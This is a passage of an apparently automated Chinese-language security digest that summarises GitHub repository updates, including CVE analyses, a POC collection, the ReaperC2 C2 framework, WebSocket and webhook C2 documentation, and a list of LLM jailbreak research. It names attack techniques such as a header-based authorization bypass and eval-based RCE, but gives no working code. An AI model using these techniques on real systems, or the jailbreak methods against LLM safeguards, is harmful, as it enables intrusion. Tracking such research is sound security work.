| 3 | 配置Ollama以允许外部连接,增强了平台功能 |
|
|||
|
|
| 4 | 修复了adaptive_nmap_scan.py中的try-except代码块 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 修改install.sh,修复了adaptive_nmap_scan.py中的缩进错误,增加了对try-except代码块的修复,修复了程序中的语法错误。
|
|||
|
|
|
|||
|
|
> 修改install.sh,配置Ollama服务以允许外部连接,通过systemd管理Ollama服务,增强了平台与外部的交互能力。
|
|||
|
|
|
|||
|
|
> 修改adaptive_nmap_scan.py,增加了对try-except代码块的修复,提高了代码的健壮性。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• install.sh
|
|||
|
|
• adaptive_nmap_scan.py
|
|||
|
|
• Ollama
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
修复代码错误和增强功能,提高了平台的稳定性和可用性。对adaptive_nmap_scan.py中try-except代码块的修复,提升了代码的健壮性。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### wisent-guard - LLM安全防护框架Wisent Guard更新
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [wisent-guard](https://github.com/wisent-ai/wisent-guard) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `安全功能` |
|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **1**
|
|||
|
|
- 变更文件数: **25**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
Wisent-guard 是一个用于监控和防御语言模型(LLM)中有害内容和幻觉的开源框架。此次更新涉及多个方面,包括对Llama 3.1模型的支持,以及优化检测性能的参数调整和评估脚本。更新内容包括:1. 增加了对Llama 3.1模型的支持,体现在`evaluate_llama_truthfulqa.py`中。2. 新增了多种评估脚本,如`evaluate_vector_quality.py`, `layer_sweep.py` 等,用于分析向量质量和优化参数。3. 提供了`save_activations_all_layers.py`脚本,用于为所有层生成激活向量。4. 增加了优化阈值的脚本,并生成了优化结果。5. 完善了`wisent_guard`库,增强了其对不同模型格式的支持,例如Llama 3.1和Mistral,包括`wisent_guard/guard.py`和`wisent_guard/inference.py`的修改。更新还包括了新的数据文件以及改进的评估指标。这些更新旨在提升Wisent-Guard在检测和防御LLM有害内容和幻觉方面的能力。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 增加了对Llama 3.1 模型及Mistral格式的支持 |
|
|||
|
|
| 2 | 新增评估脚本,用于分析向量质量和优化检测参数 |
|
|||
|
|
| 3 | 提供了生成所有层激活向量的脚本 |
|
|||
|
|
| 4 | 优化了阈值,提升了检测精度 |
|
|||
|
|
| 5 | 增强了对不同模型格式的支持 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 新增了对Llama 3.1模型格式的支持,涉及到Prompt格式的修改,并增加了对Mistral格式的支持。
|
|||
|
|
|
|||
|
|
> 修改了`wisent_guard/guard.py`和`wisent_guard/inference.py`,增加了对不同模型格式的支持,例如Llama 3.1和Mistral。增加了`force_format`和`force_llama_format`参数。
|
|||
|
|
|
|||
|
|
> 新增了多种评估脚本,例如优化检测参数的脚本以及用于分析向量质量的脚本
|
|||
|
|
|
|||
|
|
> 提供了创建所有层向量的脚本
|
|||
|
|
|
|||
|
|
> 优化了阈值,提升了检测精度
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• wisent_guard
|
|||
|
|
• transformers
|
|||
|
|
• AutoModelForCausalLM
|
|||
|
|
• AutoTokenizer
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
此次更新增强了Wisent-Guard对不同LLM的支持,并通过优化参数和增加评估脚本,提升了其检测有害内容和幻觉的能力,使其更具实用价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### anubis - AI流量验证系统,防御AI爬虫
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [anubis](https://github.com/TecharoHQ/anubis) |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 安全类型 | `安全修复` |
|
|||
|
|
| 更新类型 | `SECURITY_CRITICAL` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **2**
|
|||
|
|
- 变更文件数: **5**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是一个基于工作量证明(PoW)的 HTTP 请求验证系统,旨在阻止 AI 爬虫。主要功能包括对 HTTP 请求进行挑战,验证客户端是否为人类。更新内容包括:
|
|||
|
|
|
|||
|
|
1. 支持通过文件加载 ed25519 密钥,增加了密钥配置的灵活性。
|
|||
|
|
2. 修复了CVE-2025-24369漏洞,该漏洞是由于代码重构中的逻辑错误导致的。该漏洞允许攻击者绕过验证机制。
|
|||
|
|
|
|||
|
|
修复CVE-2025-24369漏洞的细节:
|
|||
|
|
该漏洞存在于`lib/anubis.go`文件中,`s.PassChallenge`函数中对挑战结果的验证逻辑存在缺陷。 在之前的版本中,没有正确使用`s.ChallengeDifficulty`验证难度。漏洞修复后,`PassChallenge`函数将使用正确的难度进行验证,确保只有满足PoW要求的客户端才能通过验证。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | Anubis系统用于阻止AI爬虫,通过PoW验证HTTP请求 |
|
|||
|
|
| 2 | 更新支持通过文件加载ed25519密钥 |
|
|||
|
|
| 3 | 修复了CVE-2025-24369安全漏洞,该漏洞允许绕过挑战机制 |
|
|||
|
|
| 4 | 增加了测试用例以验证漏洞修复 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 新增了通过文件加载 ed25519 密钥的功能,增强了密钥配置的灵活性,允许从文件中读取 ed25519 密钥(`-ed25519-private-key-hex-file` 或 `ED25519_PRIVATE_KEY_HEX_FILE`)。
|
|||
|
|
|
|||
|
|
> 修复CVE-2025-24369漏洞,确保`PassChallenge`函数使用正确的难度验证PoW结果。
|
|||
|
|
|
|||
|
|
> 增加了测试用例`TestCVE2025_24369`,用于验证CVE-2025-24369漏洞是否被修复。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• cmd/anubis/main.go
|
|||
|
|
• lib/anubis.go
|
|||
|
|
• lib/anubis_test.go
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
修复了安全漏洞CVE-2025-24369,该漏洞允许绕过PoW挑战,直接访问受保护的资源。修复该漏洞可以提高系统的安全性,阻止恶意爬虫绕过安全机制。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### VulnWatchdog - 自动化漏洞监控与分析工具
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [VulnWatchdog](https://github.com/arschlochnop/VulnWatchdog) |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 安全类型 | `漏洞利用/POC更新/安全研究` |
|
|||
|
|
| 更新类型 | `SECURITY_CRITICAL` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **5**
|
|||
|
|
- 变更文件数: **8**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是一个自动化漏洞监控和分析工具,可以从GitHub上获取CVE相关仓库,并使用GPT进行分析。本次更新增加了多个CVE的分析报告。其中,CVE-2025-29927是Next.js中间件的授权绕过漏洞,攻击者通过构造特殊的请求头绕过授权。CVE-2025-0868是DocsGPT的远程代码执行漏洞,通过`eval()`函数执行恶意Python代码。CVE-2025-25705和CVE-2025-25706均是ProApps Enterprise Appliance的远程代码执行漏洞,攻击者可以通过注入命令执行任意代码。CVE-2022-4174是Chrome V8引擎的类型混淆漏洞。CVE-2013-3900是Windows签名验证绕过漏洞,通过修改PE文件添加恶意代码执行。CVE-2025-24813是Apache Tomcat的远程代码执行漏洞,需要满足多个条件才能利用。CVE-2023-32784是KeePass的明文密码恢复漏洞,需要获取内存dump文件。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 自动化的CVE监控和分析工具。 |
|
|||
|
|
| 2 | 更新了多个CVE漏洞的分析报告。 |
|
|||
|
|
| 3 | 包含了多种类型的漏洞,包括RCE、授权绕过、信息泄露等。 |
|
|||
|
|
| 4 | 部分漏洞提供了POC,增加了潜在的风险。 |
|
|||
|
|
| 5 | 分析报告内容包含漏洞描述、利用条件、影响版本等 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> CVE-2025-29927: Next.js授权绕过漏洞,通过修改`x-middleware-subrequest`请求头绕过授权检查。
|
|||
|
|
|
|||
|
|
> CVE-2025-0868: DocsGPT RCE,通过`/api/remote`端点,利用`eval()`执行任意Python代码。
|
|||
|
|
|
|||
|
|
> CVE-2025-25705/CVE-2025-25706: ProApps Enterprise Appliance RCE,注入命令到`host`参数。
|
|||
|
|
|
|||
|
|
> CVE-2022-4174: Chrome V8类型混淆漏洞,通过构造恶意HTML页面触发堆损坏。
|
|||
|
|
|
|||
|
|
> CVE-2013-3900: Windows签名验证绕过,通过修改PE文件绕过签名验证。
|
|||
|
|
|
|||
|
|
> CVE-2025-24813: Apache Tomcat RCE,需要满足多个条件才能利用,包括DefaultServlet 写入功能启用等。
|
|||
|
|
|
|||
|
|
> CVE-2023-32784: KeePass 密码恢复漏洞,从内存dump中恢复明文密码。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Next.js
|
|||
|
|
• DocsGPT
|
|||
|
|
• ProApps Enterprise Appliance
|
|||
|
|
• Google Chrome
|
|||
|
|
• Windows操作系统
|
|||
|
|
• Apache Tomcat
|
|||
|
|
• KeePass
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该仓库更新了多个CVE漏洞的分析报告,其中包含RCE和信息泄露等高危漏洞的详细信息,并且部分漏洞提供了POC,具有较高的安全研究价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### defectdojo-mcp - AI驱动漏洞分析和报告
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [defectdojo-mcp](https://github.com/jamiesonio/defectdojo-mcp) |
|
|||
|
|
| 风险等级 | `LOW` |
|
|||
|
|
| 安全类型 | `安全工具` |
|
|||
|
|
| 更新类型 | `新增` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **1**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是一个实验性的ModelContextProtocol服务器,它连接大型语言模型(LLMs)到DefectDojo,以实现AI驱动的安全工作流程。它通过轻量级中间件集成实现了与漏洞数据的自然语言交互,简化了安全分析,并自动化了报告生成。由于是初始提交,目前的功能主要集中在AI辅助的安全分析和报告生成上,但具体实现细节和安全性有待进一步评估。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 使用AI增强安全分析和报告 |
|
|||
|
|
| 2 | 连接LLMs与DefectDojo |
|
|||
|
|
| 3 | 实现自然语言交互的漏洞数据分析 |
|
|||
|
|
| 4 | 自动化安全报告生成 |
|
|||
|
|
| 5 | 与AI+Security关键词高度相关 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> ModelContextProtocol服务器
|
|||
|
|
|
|||
|
|
> 轻量级中间件集成
|
|||
|
|
|
|||
|
|
> 基于LLMs的自然语言处理
|
|||
|
|
|
|||
|
|
> 与DefectDojo的数据交互
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• DefectDojo
|
|||
|
|
• LLMs
|
|||
|
|
• 中间件
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该仓库直接关联了AI与安全,并尝试利用AI技术提升安全分析效率和自动化报告,与搜索关键词'AI+Security'高度相关。虽然是初始提交,但其目标具有创新性,如果后续能实现高质量的漏洞分析或安全研究,具有潜在价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### vulnerability-analysis - AI赋能的容器漏洞分析
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [vulnerability-analysis](https://github.com/NVIDIA-AI-Blueprints/vulnerability-analysis) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `安全功能` |
|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **5**
|
|||
|
|
- 变更文件数: **9**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是一个使用生成式 AI 快速识别和缓解容器安全漏洞的工具。主要功能包括:扫描容器镜像、分析 SBOM、利用 AI 模型进行漏洞分析。
|
|||
|
|
|
|||
|
|
本次更新主要新增了从 HTTP 输入解析 SBOM 的功能(#85),增强了对 SBOM 文件的支持,使其能够从 HTTP URL 获取 SBOM 文件。同时,完善了配置架构,添加了max_concurrency字段,增强了程序的可配置性。增加了 SECURITY.md 文件,介绍了安全相关的流程和联系方式。
|
|||
|
|
|
|||
|
|
更新内容中,涉及到了 SBOM 的处理,SBOM 可以帮助识别容器中使用的组件及其版本,这对于漏洞分析至关重要。通过 HTTP 方式获取 SBOM 使得该工具可以更灵活地集成到不同的环境中。新增的配置项提升了程序的可控性。
|
|||
|
|
|
|||
|
|
由于该项目主要关注容器漏洞分析,更新内容与安全密切相关,所以本次更新具有一定的价值。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 支持从 HTTP 输入解析 SBOM |
|
|||
|
|
| 2 | 增加了配置选项 max_concurrency |
|
|||
|
|
| 3 | 新增 SECURITY.md 文件,增强安全性 |
|
|||
|
|
| 4 | 改进了对 SBOM 文件的支持 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 新增 HTTPSBOMInfoInput 数据模型,用于处理从 HTTP URL 获取 SBOM 的配置。
|
|||
|
|
|
|||
|
|
> 修改了 src/cve/pipeline/input.py,增加了对 HTTPSBOMInfoInput 的支持。
|
|||
|
|
|
|||
|
|
> 修改了 src/cve/pipeline/pipeline.py,加入了 HTTP 方式解析 SBOM 的逻辑。
|
|||
|
|
|
|||
|
|
> 在 src/cve/run.py 中增加了 --sbom_file_path 选项,用于指定 SBOM 文件路径。
|
|||
|
|
|
|||
|
|
> 在 src/cve/stages/convert_to_output_object.py 中新增了 _get_no_sbom_output 函数,用于处理没有 SBOM 的情况。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• src/cve/data_models/input.py
|
|||
|
|
• src/cve/pipeline/input.py
|
|||
|
|
• src/cve/pipeline/pipeline.py
|
|||
|
|
• src/cve/run.py
|
|||
|
|
• src/cve/stages/convert_to_output_object.py
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
增加了从 HTTP 导入 SBOM 的功能,增强了工具的灵活性,对 SBOM 的支持是容器漏洞分析的重要环节。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### POC - 漏洞EXP/POC收集仓库
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [POC](https://github.com/eeeeeeeeee-code/POC) |
|
|||
|
|
| 风险等级 | `CRITICAL` |
|
|||
|
|
| 安全类型 | `POC更新` |
|
|||
|
|
| 更新类型 | `SECURITY_CRITICAL` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **3**
|
|||
|
|
- 变更文件数: **3**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是一个漏洞EXP/POC的收集和整理仓库,主要收集网络上的漏洞利用代码。本次更新新增了一个KUBERNETES INGRESS-NGINX远程代码执行漏洞(CVE-2025-1974)的POC。根据README.md的描述,该仓库收集整理漏洞EXP/POC,并提供相关的利用代码,这对于安全研究人员和渗透测试人员来说具有重要的参考价值。更新中提到了CVE-2025-1974漏洞,说明仓库关注了最新的安全漏洞,并提供了对应的POC,使得使用者可以快速了解和验证漏洞。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 收集整理漏洞EXP/POC,主要来源网络。 |
|
|||
|
|
| 2 | 更新包含KUBERNETES INGRESS-NGINX远程代码执行漏洞(CVE-2025-1974)的POC。 |
|
|||
|
|
| 3 | 更新说明了漏洞的类型和影响。 |
|
|||
|
|
| 4 | 仓库提供了用于漏洞分析和测试的POC。 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 仓库提供了KUBERNETES INGRESS-NGINX远程代码执行漏洞(CVE-2025-1974)的POC,具体实现细节需要参考./wpoc/KUBERNETES INGRESS-NGINX/KUBERNETES INGRESS-NGINX远程代码执行漏洞(CVE-2025-1974).md文件。
|
|||
|
|
|
|||
|
|
> 该POC有助于安全研究人员理解和复现CVE-2025-1974漏洞,进而分析其影响和防护措施。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• KUBERNETES INGRESS-NGINX
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该仓库提供了CVE-2025-1974漏洞的POC,可以帮助安全研究人员进行漏洞复现和分析,具有一定的价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### ReaperC2 - Kubernetes C2框架部署更新
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [ReaperC2](https://github.com/BuildAndDestroy/ReaperC2) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `安全功能` |
|
|||
|
|
| 更新类型 | `GENERAL_UPDATE` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **4**
|
|||
|
|
- 变更文件数: **9**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
ReaperC2是一个基于Kubernetes和云的C2框架。本次更新主要增加了Kubernetes部署的支持。具体来说,此次更新新增了Kubernetes的部署文件(full-deployment.yaml),包含MongoDB和ReaperC2的部署配置。同时,修改了数据库连接字符串,使用Kubernetes Service的FQDN。还新增了一个busybox的测试pod用于调试。这些更新使得ReaperC2的部署更加方便,也更适应Kubernetes环境。由于是C2框架,所以存在被用于恶意用途的风险。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 增加了Kubernetes部署配置 |
|
|||
|
|
| 2 | 修改了数据库连接方式 |
|
|||
|
|
| 3 | 新增busybox测试pod |
|
|||
|
|
| 4 | 方便在Kubernetes上部署C2框架 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 新增了.github/workflows/go.yml用于构建golang项目
|
|||
|
|
|
|||
|
|
> 新增了deployments/k8s/full-deployment.yaml,包含namespace、secret、service、persistentvolume和pod的配置,用于部署MongoDB和ReaperC2到Kubernetes上
|
|||
|
|
|
|||
|
|
> 修改了pkg/dbconnections/mongoconnections.go,将mongoURI修改为使用Kubernetes Service的FQDN进行数据库连接
|
|||
|
|
|
|||
|
|
> 新增test/busybox.yaml用于调试
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• ReaperC2 C2框架
|
|||
|
|
• Kubernetes环境
|
|||
|
|
• MongoDB数据库
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
增加了Kubernetes部署的配置,使得C2框架部署和使用更加容易,便于渗透测试人员使用。任何C2框架都有被恶意使用的风险。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### LOTWebSockets.github.io - WebSockets C2 渗透测试文档
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [LOTWebSockets.github.io](https://github.com/LOTWebSockets/LOTWebSockets.github.io) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `安全研究` |
|
|||
|
|
| 更新类型 | `项目更正` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **5**
|
|||
|
|
- 变更文件数: **1**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是一个社区驱动的项目,主要文档化了可能被用于数据窃取和C2通信的WebSockets技术。本次更新修改了README.md文件,从LOTWebHooks项目更正为LOTWebSockets项目,并修改了项目介绍。虽然项目本身没有提供具体的漏洞利用代码或POC,但它专注于WebSockets在C2通信中的应用,并鼓励社区贡献相关内容,这对于渗透测试和安全研究具有一定的参考价值。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 文档化WebSockets技术,侧重于C2通信和数据窃取。 |
|
|||
|
|
| 2 | 社区驱动项目,鼓励贡献。 |
|
|||
|
|
| 3 | README.md文件更新,修正了项目名称和描述。 |
|
|||
|
|
| 4 | 与C2关键词高度相关,明确了WebSockets在C2中的应用。 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 项目基于WebSockets技术。
|
|||
|
|
|
|||
|
|
> 通过文档和社区贡献的方式,收集和整理相关信息。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• WebSockets协议
|
|||
|
|
• C2通信系统
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该项目与C2关键词高度相关,明确了WebSockets在C2中的应用场景。虽然目前主要以文档为主,但其社区驱动的模式和项目目标对于安全研究,特别是渗透测试领域具有潜在的价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### LOTWebhooks.github.io - Webhook C2 资料收集项目
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [LOTWebhooks.github.io](https://github.com/LOTWebHooks/LOTWebhooks.github.io) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `安全研究` |
|
|||
|
|
| 更新类型 | `项目初始化` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **3**
|
|||
|
|
- 变更文件数: **1**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该项目LOTWebHooks旨在收集和记录可用于数据窃取和C2通信的Webhook。本次更新是项目的初始化,README.md文件被添加,其中包含了项目介绍、贡献方式和联系方式。该项目主要关注Webhook在安全领域的应用,特别是C2通信和数据泄露。由于该项目是收集型项目,不包含任何漏洞利用代码,但是提供了Webhook相关的安全信息。此次更新是项目的初始化,所以没有具体的安全更新内容。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 收集了用于数据窃取和C2通信的Webhook信息 |
|
|||
|
|
| 2 | 项目专注于Webhook在安全领域中的应用 |
|
|||
|
|
| 3 | 为安全研究人员提供了Webhook相关信息 |
|
|||
|
|
| 4 | 与C2关键词高度相关 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 项目文档描述了Webhook在数据泄露和C2通信中的利用场景
|
|||
|
|
|
|||
|
|
> README.md 提供了项目介绍和贡献方式
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Webhook
|
|||
|
|
• 相关通信协议
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该项目与C2关键词高度相关,因为它专注于收集和记录可用于C2通信的Webhook。虽然它不包含漏洞利用代码,但提供了Webhook相关的安全信息,对安全研究具有参考价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### Awesome-Jailbreak-on-LLMs - LLMs越狱方法收集
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [Awesome-Jailbreak-on-LLMs](https://github.com/yueliu1999/Awesome-Jailbreak-on-LLMs) |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 安全类型 | `漏洞利用/安全研究` |
|
|||
|
|
| 更新类型 | `SECURITY_CRITICAL` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **5**
|
|||
|
|
- 变更文件数: **5**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库收集了LLMs越狱相关论文、代码、数据集、评估和分析。本次更新新增了多个关于LLM攻击的论文,包括针对推理LLM的攻击,如减缓攻击、后门攻击和链式思考劫持等,以及针对LLM的通用对抗触发器。这些攻击方法旨在绕过LLM的安全机制,从而引发LLMs的恶意行为。由于这些研究涉及对LLM的攻击方法,因此具有较高的安全风险。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 收集LLM越狱相关论文和代码 |
|
|||
|
|
